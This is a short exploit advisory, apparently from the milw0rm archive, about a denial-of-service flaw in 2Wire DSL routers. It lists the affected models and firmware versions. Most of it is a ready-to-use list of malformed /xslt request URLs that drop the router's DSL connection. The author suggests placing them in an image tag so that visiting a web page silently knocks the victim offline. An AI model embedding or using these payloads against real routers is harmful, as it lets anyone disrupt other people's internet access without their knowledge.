2WIRE ROUTER DSL DENIAL OF SERVICE VULNERABLE Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51 The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. PoC: (this can be set in an IMG tag or whatever) http://gateway.2wire.net/xslt?page=%& http://gateway.2wire.net/xslt?page=%@ http://gateway.2wire.net/xslt?page=%! http://gateway.2wire.net/xslt?page=%+ http://gateway.2wire.net/xslt?page=%; http://gateway.2wire.net/xslt?page=%' http://gateway.2wire.net/xslt?page=%~ http://gateway.2wire.net/xslt?page=%* http://gateway.2wire.net/xslt?page=%0 http://gateway.2wire.net/xslt?page=%9 http://gateway.2wire.net/xslt?page=%? http://home... etc... hkm hkm {@} hakim.ws Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex. # milw0rm.com [2008-11-08]